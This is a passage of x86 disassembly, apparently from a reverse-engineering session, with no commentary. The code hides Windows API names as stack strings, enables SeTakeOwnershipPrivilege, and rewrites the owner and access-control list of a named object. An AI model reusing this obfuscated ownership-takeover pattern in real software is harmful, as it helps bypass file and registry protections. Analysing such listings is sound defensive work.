mov     [ebp+var_5F], 6Ch ; 'l'
mov     [ebp+var_5E], 75h ; 'u'
mov     [ebp+var_5D], 65h ; 'e'
mov     [ebp+var_5C], 41h ; 'A'
mov     [ebp+var_5B], 0
lea     eax, [ebp+var_70]
push    eax
lea     ecx, [ebp+var_8C]
push    ecx
call    sub_401530
add     esp, 8
mov     [ebp+var_30], eax
mov     [ebp+var_50], 0
mov     [ebp+var_48], 41h ; 'A'
mov     [ebp+var_47], 64h ; 'd'
mov     [ebp+var_46], 6Ah ; 'j'
mov     [ebp+var_45], 75h ; 'u'
mov     [ebp+var_44], 73h ; 's'
mov     [ebp+var_43], 74h ; 't'
mov     [ebp+var_42], 54h ; 'T'
mov     [ebp+var_41], 6Fh ; 'o'
mov     [ebp+var_40], 6Bh ; 'k'
mov     [ebp+var_3F], 65h ; 'e'
mov     [ebp+var_3E], 6Eh ; 'n'
mov     [ebp+var_3D], 50h ; 'P'
mov     [ebp+var_3C], 72h ; 'r'
mov     [ebp+var_3B], 69h ; 'i'
mov     [ebp+var_3A], 76h ; 'v'
mov     [ebp+var_39], 69h ; 'i'
mov     [ebp+var_38], 6Ch ; 'l'
mov     [ebp+var_37], 65h ; 'e'
mov     [ebp+var_36], 67h ; 'g'
mov     [ebp+var_35], 65h ; 'e'
mov     [ebp+var_34], 73h ; 's'
mov     [ebp+var_33], 0
lea     edx, [ebp+var_48]
push    edx
lea     eax, [ebp+var_8C]
push    eax
call    sub_401530
add     esp, 8
mov     [ebp+var_50], eax
mov     [ebp+var_4C], 0
mov     [ebp+var_2C], 47h ; 'G'
mov     [ebp+var_2B], 65h ; 'e'
mov     [ebp+var_2A], 74h ; 't'
mov     [ebp+var_29], 4Ch ; 'L'
mov     [ebp+var_28], 61h ; 'a'
mov     [ebp+var_27], 73h ; 's'
mov     [ebp+var_26], 74h ; 't'
mov     [ebp+var_25], 45h ; 'E'
mov     [ebp+var_24], 72h ; 'r'
mov     [ebp+var_23], 72h ; 'r'
mov     [ebp+var_22], 6Fh ; 'o'
mov     [ebp+var_21], 72h ; 'r'
mov     [ebp+var_20], 0
mov     [ebp+var_1C], 6Bh ; 'k'
mov     [ebp+var_1B], 0
mov     [ebp+var_1A], 65h ; 'e'
mov     [ebp+var_19], 0
mov     [ebp+var_18], 72h ; 'r'
mov     [ebp+var_17], 0
mov     [ebp+var_16], 6Eh ; 'n'
mov     [ebp+var_15], 0
mov     [ebp+var_14], 65h ; 'e'
mov     [ebp+var_13], 0
mov     [ebp+var_12], 6Ch ; 'l'
mov     [ebp+var_11], 0
mov     [ebp+var_10], 33h ; '3'
mov     [ebp+var_F], 0
mov     [ebp+var_E], 32h ; '2'
mov     [ebp+var_D], 0
mov     [ebp+var_C], 2Eh ; '.'
mov     [ebp+var_B], 0
mov     [ebp+var_A], 64h ; 'd'
mov     [ebp+var_9], 0
mov     [ebp+var_8], 6Ch ; 'l'
mov     [ebp+var_7], 0
mov     [ebp+var_6], 6Ch ; 'l'
mov     [ebp+var_5], 0
mov     [ebp+var_4], 0
mov     [ebp+var_3], 0
lea     ecx, [ebp+var_2C]
push    ecx
lea     edx, [ebp+var_1C]
push    edx
call    sub_401530
add     esp, 8
mov     [ebp+var_4C], eax
lea     eax, [ebp+var_58]
push    eax
mov     ecx, [ebp+arg_4]
push    ecx
push    0
call    [ebp+var_30]
test    eax, eax
jnz     short loc_40199A
xor     eax, eax
jmp     short loc_401A03

loc_40199A:
mov     [ebp+var_9C], 1
mov     edx, [ebp+var_58]
mov     [ebp+var_98], edx
mov     eax, [ebp+var_54]
mov     [ebp+var_94], eax
cmp     [ebp+arg_8], 0
jz      short loc_4019C8
mov     [ebp+var_90], 2
jmp     short loc_4019D2

loc_4019C8:
mov     [ebp+var_90], 0

loc_4019D2:
push    0
push    0
push    10h
lea     ecx, [ebp+var_9C]
push    ecx
push    0
mov     edx, [ebp+arg_0]
push    edx
call    [ebp+var_50]
test    eax, eax
jnz     short loc_4019F0
xor     eax, eax
jmp     short loc_401A03

loc_4019F0:
call    [ebp+var_4C]
cmp     eax, 514h
jnz     short loc_4019FE
xor     eax, eax
jmp     short loc_401A03

loc_4019FE:
mov     eax, 1

loc_401A03:
mov     esp, ebp
pop     ebp
retn
sub_401750 endp

align 10h


; Attributes: bp-based frame

sub_401A10 proc near

var_174= dword ptr -174h
var_170= byte ptr -170h
var_16F= byte ptr -16Fh
var_16E= byte ptr -16Eh
var_16D= byte ptr -16Dh
var_16C= byte ptr -16Ch
var_16B= byte ptr -16Bh
var_16A= byte ptr -16Ah
var_169= byte ptr -169h
var_168= byte ptr -168h
var_167= byte ptr -167h
var_166= byte ptr -166h
var_165= byte ptr -165h
var_164= byte ptr -164h
var_163= byte ptr -163h
var_162= byte ptr -162h
var_161= byte ptr -161h
var_160= byte ptr -160h
var_15F= byte ptr -15Fh
var_15E= byte ptr -15Eh
var_15D= byte ptr -15Dh
var_15C= byte ptr -15Ch
var_15B= byte ptr -15Bh
var_15A= byte ptr -15Ah
var_159= byte ptr -159h
var_158= byte ptr -158h
var_157= byte ptr -157h
var_154= byte ptr -154h
var_153= byte ptr -153h
var_152= byte ptr -152h
var_151= byte ptr -151h
var_150= byte ptr -150h
var_14F= byte ptr -14Fh
var_14E= byte ptr -14Eh
var_14D= byte ptr -14Dh
var_14C= byte ptr -14Ch
var_14B= byte ptr -14Bh
var_14A= byte ptr -14Ah
var_149= byte ptr -149h
var_148= byte ptr -148h
var_147= byte ptr -147h
var_146= byte ptr -146h
var_145= byte ptr -145h
var_144= byte ptr -144h
var_143= byte ptr -143h
var_142= byte ptr -142h
var_141= byte ptr -141h
var_140= byte ptr -140h
var_13F= byte ptr -13Fh
var_13C= byte ptr -13Ch
var_13B= byte ptr -13Bh
var_13A= byte ptr -13Ah
var_139= byte ptr -139h
var_138= byte ptr -138h
var_137= byte ptr -137h
var_136= byte ptr -136h
var_135= byte ptr -135h
var_134= byte ptr -134h
var_133= byte ptr -133h
var_132= byte ptr -132h
var_131= byte ptr -131h
var_130= byte ptr -130h
var_12F= byte ptr -12Fh
var_12E= byte ptr -12Eh
var_12D= byte ptr -12Dh
var_12C= byte ptr -12Ch
var_12B= byte ptr -12Bh
var_128= dword ptr -128h
var_124= dword ptr -124h
var_120= dword ptr -120h
var_114= dword ptr -114h
var_110= dword ptr -110h
var_10C= dword ptr -10Ch
var_108= dword ptr -108h
var_104= dword ptr -104h
var_100= dword ptr -100h
var_F4= dword ptr -0F4h
var_F0= dword ptr -0F0h
var_EC= dword ptr -0ECh
var_E4= byte ptr -0E4h
var_E3= byte ptr -0E3h
var_E2= byte ptr -0E2h
var_E1= byte ptr -0E1h
var_E0= byte ptr -0E0h
var_DF= byte ptr -0DFh
var_DE= byte ptr -0DEh
var_DD= byte ptr -0DDh
var_DC= byte ptr -0DCh
var_DB= byte ptr -0DBh
var_DA= byte ptr -0DAh
var_D9= byte ptr -0D9h
var_D8= byte ptr -0D8h
var_D7= byte ptr -0D7h
var_D6= byte ptr -0D6h
var_D5= byte ptr -0D5h
var_D4= byte ptr -0D4h
var_D3= byte ptr -0D3h
var_D2= byte ptr -0D2h
var_D1= byte ptr -0D1h
var_D0= byte ptr -0D0h
var_CF= byte ptr -0CFh
var_CE= byte ptr -0CEh
var_CD= byte ptr -0CDh
var_CC= byte ptr -0CCh
var_C8= byte ptr -0C8h
var_C7= byte ptr -0C7h
var_C6= byte ptr -0C6h
var_C5= byte ptr -0C5h
var_C4= byte ptr -0C4h
var_C3= byte ptr -0C3h
var_C2= byte ptr -0C2h
var_C1= byte ptr -0C1h
var_C0= byte ptr -0C0h
var_BF= byte ptr -0BFh
var_BE= byte ptr -0BEh
var_BD= byte ptr -0BDh
var_BC= dword ptr -0BCh
var_B8= dword ptr -0B8h
var_B4= dword ptr -0B4h
var_B0= dword ptr -0B0h
var_AC= byte ptr -0ACh
var_AB= byte ptr -0ABh
var_AA= byte ptr -0AAh
var_A9= byte ptr -0A9h
var_A8= byte ptr -0A8h
var_A7= byte ptr -0A7h
var_A6= byte ptr -0A6h
var_A5= byte ptr -0A5h
var_A4= byte ptr -0A4h
var_A3= byte ptr -0A3h
var_A2= byte ptr -0A2h
var_A1= byte ptr -0A1h
var_A0= byte ptr -0A0h
var_9F= byte ptr -9Fh
var_9E= byte ptr -9Eh
var_9D= byte ptr -9Dh
var_9C= byte ptr -9Ch
var_98= dword ptr -98h
var_94= dword ptr -94h
var_90= byte ptr -90h
var_8F= byte ptr -8Fh
var_8E= byte ptr -8Eh
var_8D= byte ptr -8Dh
var_8C= byte ptr -8Ch
var_8B= byte ptr -8Bh
var_8A= byte ptr -8Ah
var_89= byte ptr -89h
var_88= byte ptr -88h
var_87= byte ptr -87h
var_86= byte ptr -86h
var_85= byte ptr -85h
var_84= byte ptr -84h
var_83= byte ptr -83h
var_82= byte ptr -82h
var_81= byte ptr -81h
var_80= byte ptr -80h
var_7F= byte ptr -7Fh
var_7E= byte ptr -7Eh
var_7D= byte ptr -7Dh
var_7C= byte ptr -7Ch
var_7B= byte ptr -7Bh
var_7A= byte ptr -7Ah
var_79= byte ptr -79h
var_78= byte ptr -78h
var_74= byte ptr -74h
var_73= byte ptr -73h
var_72= byte ptr -72h
var_71= byte ptr -71h
var_70= byte ptr -70h
var_6F= byte ptr -6Fh
var_6E= byte ptr -6Eh
var_6D= byte ptr -6Dh
var_6C= dword ptr -6Ch
var_68= dword ptr -68h
var_64= dword ptr -64h
var_60= byte ptr -60h
var_5F= byte ptr -5Fh
var_5E= byte ptr -5Eh
var_5D= byte ptr -5Dh
var_5C= byte ptr -5Ch
var_5B= byte ptr -5Bh
var_5A= byte ptr -5Ah
var_59= byte ptr -59h
var_58= byte ptr -58h
var_57= byte ptr -57h
var_54= dword ptr -54h
var_50= byte ptr -50h
var_4F= byte ptr -4Fh
var_4E= byte ptr -4Eh
var_4D= byte ptr -4Dh
var_4C= byte ptr -4Ch
var_4B= byte ptr -4Bh
var_48= byte ptr -48h
var_47= byte ptr -47h
var_46= byte ptr -46h
var_45= byte ptr -45h
var_44= byte ptr -44h
var_43= byte ptr -43h
var_42= byte ptr -42h
var_41= byte ptr -41h
var_40= byte ptr -40h
var_3F= byte ptr -3Fh
var_3E= byte ptr -3Eh
var_3D= byte ptr -3Dh
var_3C= byte ptr -3Ch
var_3B= byte ptr -3Bh
var_3A= byte ptr -3Ah
var_39= byte ptr -39h
var_38= byte ptr -38h
var_37= byte ptr -37h
var_36= byte ptr -36h
var_35= byte ptr -35h
var_34= byte ptr -34h
var_33= byte ptr -33h
var_32= byte ptr -32h
var_31= byte ptr -31h
var_30= byte ptr -30h
var_2F= byte ptr -2Fh
var_2C= byte ptr -2Ch
var_2B= byte ptr -2Bh
var_2A= byte ptr -2Ah
var_29= byte ptr -29h
var_28= byte ptr -28h
var_27= byte ptr -27h
var_26= byte ptr -26h
var_25= byte ptr -25h
var_24= byte ptr -24h
var_23= byte ptr -23h
var_22= byte ptr -22h
var_21= byte ptr -21h
var_20= byte ptr -20h
var_1F= byte ptr -1Fh
var_1E= byte ptr -1Eh
var_1D= byte ptr -1Dh
var_1C= byte ptr -1Ch
var_18= byte ptr -18h
var_17= byte ptr -17h
var_16= byte ptr -16h
var_15= byte ptr -15h
var_14= byte ptr -14h
var_13= byte ptr -13h
var_10= dword ptr -10h
var_C= dword ptr -0Ch
var_8= dword ptr -8
var_4= dword ptr -4
arg_0= dword ptr  8

push    ebp
mov     ebp, esp
sub     esp, 174h
mov     [ebp+var_6C], 0
mov     [ebp+var_68], 0
mov     [ebp+var_174], 0
mov     [ebp+var_94], 0
mov     [ebp+var_64], 0
mov     [ebp+var_18], 0
mov     [ebp+var_17], 0
mov     [ebp+var_16], 0
mov     [ebp+var_15], 0
mov     [ebp+var_14], 0
mov     [ebp+var_13], 1
mov     [ebp+var_50], 0
mov     [ebp+var_4F], 0
mov     [ebp+var_4E], 0
mov     [ebp+var_4D], 0
mov     [ebp+var_4C], 0
mov     [ebp+var_4B], 5
mov     [ebp+var_10], 2
mov     [ebp+var_B0], 0
mov     [ebp+var_170], 61h ; 'a'
mov     [ebp+var_16F], 0
mov     [ebp+var_16E], 64h ; 'd'
mov     [ebp+var_16D], 0
mov     [ebp+var_16C], 76h ; 'v'
mov     [ebp+var_16B], 0
mov     [ebp+var_16A], 61h ; 'a'
mov     [ebp+var_169], 0
mov     [ebp+var_168], 70h ; 'p'
mov     [ebp+var_167], 0
mov     [ebp+var_166], 69h ; 'i'
mov     [ebp+var_165], 0
mov     [ebp+var_164], 33h ; '3'
mov     [ebp+var_163], 0
mov     [ebp+var_162], 32h ; '2'
mov     [ebp+var_161], 0
mov     [ebp+var_160], 2Eh ; '.'
mov     [ebp+var_15F], 0
mov     [ebp+var_15E], 64h ; 'd'
mov     [ebp+var_15D], 0
mov     [ebp+var_15C], 6Ch ; 'l'
mov     [ebp+var_15B], 0
mov     [ebp+var_15A], 6Ch ; 'l'
mov     [ebp+var_159], 0
mov     [ebp+var_158], 0
mov     [ebp+var_157], 0
mov     [ebp+var_AC], 53h ; 'S'
mov     [ebp+var_AB], 65h ; 'e'
mov     [ebp+var_AA], 74h ; 't'
mov     [ebp+var_A9], 45h ; 'E'
mov     [ebp+var_A8], 6Eh ; 'n'
mov     [ebp+var_A7], 74h ; 't'
mov     [ebp+var_A6], 72h ; 'r'
mov     [ebp+var_A5], 69h ; 'i'
mov     [ebp+var_A4], 65h ; 'e'
mov     [ebp+var_A3], 73h ; 's'
mov     [ebp+var_A2], 49h ; 'I'
mov     [ebp+var_A1], 6Eh ; 'n'
mov     [ebp+var_A0], 41h ; 'A'
mov     [ebp+var_9F], 63h ; 'c'
mov     [ebp+var_9E], 6Ch ; 'l'
mov     [ebp+var_9D], 41h ; 'A'
mov     [ebp+var_9C], 0
lea     eax, [ebp+var_AC]
push    eax
lea     ecx, [ebp+var_170]
push    ecx
call    sub_401530
add     esp, 8
mov     [ebp+var_B0], eax
mov     [ebp+var_98], 0
mov     [ebp+var_90], 41h ; 'A'
mov     [ebp+var_8F], 6Ch ; 'l'
mov     [ebp+var_8E], 6Ch ; 'l'
mov     [ebp+var_8D], 6Fh ; 'o'
mov     [ebp+var_8C], 63h ; 'c'
mov     [ebp+var_8B], 61h ; 'a'
mov     [ebp+var_8A], 74h ; 't'
mov     [ebp+var_89], 65h ; 'e'
mov     [ebp+var_88], 41h ; 'A'
mov     [ebp+var_87], 6Eh ; 'n'
mov     [ebp+var_86], 64h ; 'd'
mov     [ebp+var_85], 49h ; 'I'
mov     [ebp+var_84], 6Eh ; 'n'
mov     [ebp+var_83], 69h ; 'i'
mov     [ebp+var_82], 74h ; 't'
mov     [ebp+var_81], 69h ; 'i'
mov     [ebp+var_80], 61h ; 'a'
mov     [ebp+var_7F], 6Ch ; 'l'
mov     [ebp+var_7E], 69h ; 'i'
mov     [ebp+var_7D], 7Ah ; 'z'
mov     [ebp+var_7C], 65h ; 'e'
mov     [ebp+var_7B], 53h ; 'S'
mov     [ebp+var_7A], 69h ; 'i'
mov     [ebp+var_79], 64h ; 'd'
mov     [ebp+var_78], 0
lea     edx, [ebp+var_90]
push    edx
lea     eax, [ebp+var_170]
push    eax
call    sub_401530
add     esp, 8
mov     [ebp+var_98], eax
mov     [ebp+var_B8], 0
mov     [ebp+var_154], 53h ; 'S'
mov     [ebp+var_153], 65h ; 'e'
mov     [ebp+var_152], 74h ; 't'
mov     [ebp+var_151], 4Eh ; 'N'
mov     [ebp+var_150], 61h ; 'a'
mov     [ebp+var_14F], 6Dh ; 'm'
mov     [ebp+var_14E], 65h ; 'e'
mov     [ebp+var_14D], 64h ; 'd'
mov     [ebp+var_14C], 53h ; 'S'
mov     [ebp+var_14B], 65h ; 'e'
mov     [ebp+var_14A], 63h ; 'c'
mov     [ebp+var_149], 75h ; 'u'
mov     [ebp+var_148], 72h ; 'r'
mov     [ebp+var_147], 69h ; 'i'
mov     [ebp+var_146], 74h ; 't'
mov     [ebp+var_145], 79h ; 'y'
mov     [ebp+var_144], 49h ; 'I'
mov     [ebp+var_143], 6Eh ; 'n'
mov     [ebp+var_142], 66h ; 'f'
mov     [ebp+var_141], 6Fh ; 'o'
mov     [ebp+var_140], 41h ; 'A'
mov     [ebp+var_13F], 0
lea     ecx, [ebp+var_154]
push    ecx
lea     edx, [ebp+var_170]
push    edx
call    sub_401530
add     esp, 8
mov     [ebp+var_B8], eax
mov     [ebp+var_BC], 0
mov     [ebp+var_48], 6Bh ; 'k'
mov     [ebp+var_47], 0
mov     [ebp+var_46], 65h ; 'e'
mov     [ebp+var_45], 0
mov     [ebp+var_44], 72h ; 'r'
mov     [ebp+var_43], 0
mov     [ebp+var_42], 6Eh ; 'n'
mov     [ebp+var_41], 0
mov     [ebp+var_40], 65h ; 'e'
mov     [ebp+var_3F], 0
mov     [ebp+var_3E], 6Ch ; 'l'
mov     [ebp+var_3D], 0
mov     [ebp+var_3C], 33h ; '3'
mov     [ebp+var_3B], 0
mov     [ebp+var_3A], 32h ; '2'
mov     [ebp+var_39], 0
mov     [ebp+var_38], 2Eh ; '.'
mov     [ebp+var_37], 0
mov     [ebp+var_36], 64h ; 'd'
mov     [ebp+var_35], 0
mov     [ebp+var_34], 6Ch ; 'l'
mov     [ebp+var_33], 0
mov     [ebp+var_32], 6Ch ; 'l'
mov     [ebp+var_31], 0
mov     [ebp+var_30], 0
mov     [ebp+var_2F], 0
mov     [ebp+var_13C], 47h ; 'G'
mov     [ebp+var_13B], 65h ; 'e'
mov     [ebp+var_13A], 74h ; 't'
mov     [ebp+var_139], 43h ; 'C'
mov     [ebp+var_138], 75h ; 'u'
mov     [ebp+var_137], 72h ; 'r'
mov     [ebp+var_136], 72h ; 'r'
mov     [ebp+var_135], 65h ; 'e'
mov     [ebp+var_134], 6Eh ; 'n'
mov     [ebp+var_133], 74h ; 't'
mov     [ebp+var_132], 50h ; 'P'
mov     [ebp+var_131], 72h ; 'r'
mov     [ebp+var_130], 6Fh ; 'o'
mov     [ebp+var_12F], 63h ; 'c'
mov     [ebp+var_12E], 65h ; 'e'
mov     [ebp+var_12D], 73h ; 's'
mov     [ebp+var_12C], 73h ; 's'
mov     [ebp+var_12B], 0
lea     eax, [ebp+var_13C]
push    eax
lea     ecx, [ebp+var_48]
push    ecx
call    sub_401530
add     esp, 8
mov     [ebp+var_BC], eax
mov     [ebp+var_8], 0
mov     [ebp+var_2C], 4Fh ; 'O'
mov     [ebp+var_2B], 70h ; 'p'
mov     [ebp+var_2A], 65h ; 'e'
mov     [ebp+var_29], 6Eh ; 'n'
mov     [ebp+var_28], 50h ; 'P'
mov     [ebp+var_27], 72h ; 'r'
mov     [ebp+var_26], 6Fh ; 'o'
mov     [ebp+var_25], 63h ; 'c'
mov     [ebp+var_24], 65h ; 'e'
mov     [ebp+var_23], 73h ; 's'
mov     [ebp+var_22], 73h ; 's'
mov     [ebp+var_21], 54h ; 'T'
mov     [ebp+var_20], 6Fh ; 'o'
mov     [ebp+var_1F], 6Bh ; 'k'
mov     [ebp+var_1E], 65h ; 'e'
mov     [ebp+var_1D], 6Eh ; 'n'
mov     [ebp+var_1C], 0
lea     edx, [ebp+var_2C]
push    edx
lea     eax, [ebp+var_170]
push    eax
call    sub_401530
add     esp, 8
mov     [ebp+var_8], eax
lea     ecx, [ebp+var_94]
push    ecx
push    0
push    0
push    0
push    0
push    0
push    0
push    0
push    0
push    1
lea     edx, [ebp+var_18]
push    edx
call    [ebp+var_98]
test    eax, eax
jnz     short loc_401EE1
jmp     loc_40215E
jmp     loc_40215E

loc_401EE1:
lea     eax, [ebp+var_174]
push    eax
push    0
push    0
push    0
push    0
push    0
push    0
push    220h
push    20h ; ' '
push    2
lea     ecx, [ebp+var_50]
push    ecx
call    [ebp+var_98]
test    eax, eax
jnz     short loc_401F15
jmp     loc_40215E
jmp     loc_40215E

loc_401F15:
push    40h ; '@'
lea     edx, [ebp+var_128]
push    edx
call    sub_402B10
add     esp, 8
mov     [ebp+var_128], 80000000h
mov     [ebp+var_124], 2
mov     [ebp+var_120], 0
mov     [ebp+var_114], 0
mov     [ebp+var_110], 5
mov     eax, [ebp+var_94]
mov     [ebp+var_10C], eax
mov     [ebp+var_108], 10000000h
mov     [ebp+var_104], 2
mov     [ebp+var_100], 0
mov     [ebp+var_F4], 0
mov     [ebp+var_F0], 2
mov     ecx, [ebp+var_174]
mov     [ebp+var_EC], ecx
lea     edx, [ebp+var_64]
push    edx
push    0
lea     eax, [ebp+var_128]
push    eax
push    2
call    [ebp+var_B0]
test    eax, eax
jz      short loc_401FC5
jmp     loc_40215E
jmp     loc_40215E

loc_401FC5:
push    0
mov     ecx, [ebp+var_64]
push    ecx
push    0
push    0
push    4
push    1
mov     edx, [ebp+arg_0]
push    edx
call    [ebp+var_B8]
mov     [ebp+var_C], eax
cmp     [ebp+var_C], 0
jnz     short loc_401FF7
mov     [ebp+var_6C], 1
jmp     loc_40215E
jmp     loc_40215E

loc_401FF7:
cmp     [ebp+var_C], 5
jz      short loc_402007
jmp     loc_40215E
jmp     loc_40215E

loc_402007:
lea     eax, [ebp+var_68]
push    eax
push    20h ; ' '
call    [ebp+var_BC]
push    eax
call    [ebp+var_8]
test    eax, eax
jnz     short loc_402025
jmp     loc_40215E
jmp     loc_40215E

loc_402025:
mov     [ebp+var_E4], 53h ; 'S'
mov     [ebp+var_E3], 65h ; 'e'
mov     [ebp+var_E2], 54h ; 'T'
mov     [ebp+var_E1], 61h ; 'a'
mov     [ebp+var_E0], 6Bh ; 'k'
mov     [ebp+var_DF], 65h ; 'e'
mov     [ebp+var_DE], 4Fh ; 'O'
mov     [ebp+var_DD], 77h ; 'w'
mov     [ebp+var_DC], 6Eh ; 'n'
mov     [ebp+var_DB], 65h ; 'e'
mov     [ebp+var_DA], 72h ; 'r'
mov     [ebp+var_D9], 73h ; 's'
mov     [ebp+var_D8], 68h ; 'h'
mov     [ebp+var_D7], 69h ; 'i'
mov     [ebp+var_D6], 70h ; 'p'
mov     [ebp+var_D5], 50h ; 'P'
mov     [ebp+var_D4], 72h ; 'r'
mov     [ebp+var_D3], 69h ; 'i'
mov     [ebp+var_D2], 76h ; 'v'
mov     [ebp+var_D1], 69h ; 'i'
mov     [ebp+var_D0], 6Ch ; 'l'
mov     [ebp+var_CF], 65h ; 'e'
mov     [ebp+var_CE], 67h ; 'g'
mov     [ebp+var_CD], 65h ; 'e'
mov     [ebp+var_CC], 0
push    1
lea     ecx, [ebp+var_E4]
push    ecx
mov     edx, [ebp+var_68]
push    edx
call    sub_401750
add     esp, 0Ch
test    eax, eax
jnz     short loc_4020F1
jmp     short loc_40215E
jmp     short loc_40215E

loc_4020F1:
push    0
push    0
push    0
mov     eax, [ebp+var_174]
push    eax
push    1
push    1
mov     ecx, [ebp+arg_0]
push    ecx
call    [ebp+var_B8]
mov     [ebp+var_C], eax
cmp     [ebp+var_C], 0
jz      short loc_402119
jmp     short loc_40215E
jmp     short loc_40215E

loc_402119:
push    0
lea     edx, [ebp+var_E4]
push    edx
mov     eax, [ebp+var_68]
push    eax
call    sub_401750
add     esp, 0Ch
test    eax, eax
jnz     short loc_402136
jmp     short loc_40215E
jmp     short loc_40215E

loc_402136:
push    0
mov     ecx, [ebp+var_64]
push    ecx
push    0
push    0
push    4
push    1
mov     edx, [ebp+arg_0]
push    edx
call    [ebp+var_B8]
mov     [ebp+var_C], eax
cmp     [ebp+var_C], 0
jnz     short loc_40215E
mov     [ebp+var_6C], 1

loc_40215E:
mov     [ebp+var_54], 0
mov     [ebp+var_74], 46h ; 'F'
mov     [ebp+var_73], 72h ; 'r'
mov     [ebp+var_72], 65h ; 'e'
mov     [ebp+var_71], 65h ; 'e'
mov     [ebp+var_70], 53h ; 'S'
mov     [ebp+var_6F], 69h ; 'i'
mov     [ebp+var_6E], 64h ; 'd'
mov     [ebp+var_6D], 0
lea     eax, [ebp+var_74]
push    eax
lea     ecx, [ebp+var_170]
push    ecx
call    sub_401530
add     esp, 8
mov     [ebp+var_54], eax
mov     [ebp+var_B4], 0
mov     [ebp+var_60], 4Ch ; 'L'
mov     [ebp+var_5F], 6Fh ; 'o'
mov     [ebp+var_5E], 63h ; 'c'
mov     [ebp+var_5D], 61h ; 'a'
mov     [ebp+var_5C], 6Ch ; 'l'
mov     [ebp+var_5B], 46h ; 'F'
mov     [ebp+var_5A], 72h ; 'r'
mov     [ebp+var_59], 65h ; 'e'
mov     [ebp+var_58], 65h ; 'e'
mov     [ebp+var_57], 0
lea     edx, [ebp+var_60]
push    edx
lea     eax, [ebp+var_48]
push    eax
call    sub_401530
add     esp, 8
mov     [ebp+var_B4], eax
mov     [ebp+var_4], 0
mov     [ebp+var_C8], 43h ; 'C'
mov     [ebp+var_C7], 6Ch ; 'l'
mov     [ebp+var_C6], 6Fh ; 'o'
mov     [ebp+var_C5], 73h ; 's'
mov     [ebp+var_C4], 65h ; 'e'
mov     [ebp+var_C3], 48h ; 'H'
mov     [ebp+var_C2], 61h ; 'a'
mov     [ebp+var_C1], 6Eh ; 'n'
mov     [ebp+var_C0], 64h ; 'd'
mov     [ebp+var_BF], 6Ch ; 'l'
mov     [ebp+var_BE], 65h ; 'e'
mov     [ebp+var_BD], 0
lea     ecx, [ebp+var_C8]
push    ecx
lea     edx, [ebp+var_48]
push    edx
call    sub_401530
add     esp, 8
mov     [ebp+var_4], eax
cmp     [ebp+var_174], 0
jz      short loc_402267
mov     eax, [ebp+var_174]
push    eax
call    [ebp+var_54]

loc_402267:
cmp     [ebp+var_94], 0
jz      short loc_40227A
mov     ecx, [ebp+var_94]
push    ecx
call    [ebp+var_54]

loc_40227A:
cmp     [ebp+var_64], 0
jz      short loc_40228A
mov     edx, [ebp+var_64]
push    edx
call    [ebp+var_B4]

loc_40228A:
cmp     [ebp+var_68], 0
jz      short loc_402297
mov     eax, [ebp+var_68]
push    eax
call    [ebp+var_4]

loc_402297:
mov     eax, [ebp+var_6C]
mov     esp, ebp
pop     ebp
retn
sub_401A10 endp

align 10h


; Attributes: bp-based frame

sub_4022A0 proc near

var_E5C= dword ptr -0E5Ch
var_E58= dword ptr -0E58h
var_E54= dword ptr -0E54h
var_E50= dword ptr -0E50h
var_E4C= dword ptr -0E4Ch
var_E48= dword ptr -0E48h
var_E44= dword ptr -0E44h
var_E40= byte ptr -0E40h
var_E3F= byte ptr -0E3Fh
var_E3C= byte ptr -0E3Ch
var_E3B= byte ptr -0E3Bh
var_E3A= byte ptr -0E3Ah
var_E39= byte ptr -0E39h
var_E38= byte ptr -0E38h
var_E37= byte ptr -0E37h
var_E36= byte ptr -0E36h
var_E35= byte ptr -0E35h
var_E34= byte ptr -0E34h
var_E33= byte ptr -0E33h
var_E32= byte ptr -0E32h
var_E31= byte ptr -0E31h
var_E30= dword ptr -0E30h
var_E2C= byte ptr -0E2Ch
var_E2B= byte ptr -0E2Bh
var_E2A= byte ptr -0E2Ah
var_E29= byte ptr -0E29h
var_E28= byte ptr -0E28h
var_E27= byte ptr -0E27h
var_E26= byte ptr -0E26h
var_E25= byte ptr -0E25h
var_E24= byte ptr -0E24h
var_E23= byte ptr -0E23h
var_E22= byte ptr -0E22h
var_E21= byte ptr -0E21h
var_E20= dword ptr -0E20h
var_E1C= byte ptr -0E1Ch
var_E1B= byte ptr -0E1Bh
var_E18= byte ptr -0E18h
var_E17= byte ptr -0E17h
var_E16= byte ptr -0E16h
var_E15= byte ptr -0E15h
var_E14= byte ptr -0E14h
var_E13= byte ptr -0E13h
var_E12= byte ptr -0E12h
var_E11= byte ptr -0E11h
var_E10= byte ptr -0E10h
var_E0F= byte ptr -0E0Fh
var_E0E= byte ptr -0E0Eh
var_E0D= byte ptr -0E0Dh
var_E0C= dword ptr -0E0Ch
var_E08= dword ptr -0E08h
var_DDC= byte ptr -0DDCh
var_DDB= byte ptr -0DDBh
var_CC8= byte ptr -0CC8h
var_8B4= dword ptr -8B4h
var_8B0= byte ptr -8B0h
var_8AF= byte ptr -8AFh
var_8AE= byte ptr -8AEh
var_8AD= byte ptr -8ADh
var_8AC= byte ptr -8ACh
var_8AB= byte ptr -8ABh
var_8AA= byte ptr -8AAh
var_8A9= byte ptr -8A9h
var_8A8= byte ptr -8A8h
var_8A7= byte ptr -8A7h
var_8A6= byte ptr -8A6h
var_8A5= byte ptr -8A5h
var_8A4= byte ptr -8A4h
var_8A3= byte ptr -8A3h
var_8A0= dword ptr -8A0h
var_89C= dword ptr -89Ch
var_898= byte ptr -898h
var_488= byte ptr -488h
var_487= byte ptr -487h
var_486= byte ptr -486h
var_485= byte ptr -485h
var_484= byte ptr -484h
var_483= byte ptr -483h
var_482= byte ptr -482h
var_481= byte ptr -481h
var_480= byte ptr -480h
var_47F= byte ptr -47Fh
var_47E= byte ptr -47Eh
var_47D= byte ptr -47Dh
var_47C= byte ptr -47Ch
var_47B= byte ptr -47Bh
var_47A= byte ptr -47Ah
var_478= byte ptr -478h
var_477= byte ptr -477h
var_476= byte ptr -476h
var_475= byte ptr -475h
var_474= byte ptr -474h
var_473= byte ptr -473h
var_472= byte ptr -472h
var_471= byte ptr -471h
var_470= byte ptr -470h
var_46F= byte ptr -46Fh
var_46C= byte ptr -46Ch
var_46B= byte ptr -46Bh
var_46A= byte ptr -46Ah
var_469= byte ptr -469h
var_468= byte ptr -468h
var_467= byte ptr -467h
var_466= byte ptr -466h
var_465= byte ptr -465h
var_464= byte ptr -464h
var_463= byte ptr -463h
var_462= byte ptr -462h
var_461= byte ptr -461h
var_460= byte ptr -460h
var_45F= byte ptr -45Fh
var_45E= byte ptr -45Eh
var_45C= byte ptr -45Ch
var_45B= byte ptr -45Bh
var_45A= byte ptr -45Ah
var_459= byte ptr -459h
var_458= byte ptr -458h
var_457= byte ptr -457h
